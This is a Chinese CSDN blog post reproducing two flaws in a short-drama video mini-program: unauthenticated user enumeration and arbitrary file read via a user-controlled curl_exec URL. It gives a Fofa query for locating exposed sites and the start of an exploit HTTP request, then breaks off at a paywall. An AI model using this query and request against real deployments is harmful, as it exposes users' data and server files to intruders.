短剧影视小程序前台未授权访问与任意文件读取

iSee857

于 2024-09-02 18:02:41 发布

阅读量550

点赞数 7

分类专栏：漏洞复现文章标签： web安全

本文链接：https://blog.csdn.net/xc_214/article/details/141825981

版权

漏洞复现专栏收录该内容

374 篇文章 ¥19.90 ¥99.00

订阅专栏

超级会员免费看

0x01 漏洞描述：

未授权:

在Index.php方法中查询了网站中User表里的所有字段，并将用户枚举出来，因为$noNeedLogin = ['*']导致可未授权访问

任意文件读取：

在/Ems.php 控制器中的 juhecurl 方法存在curl_exec函数，且参数url为用户可控，导致漏洞产生

0x02 搜索语句：

Fofa："/VwmRIfEYDH.php"

0x03 漏洞复现：

未授权访问：

POST /api/index HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

了解本专栏

超级会员免费看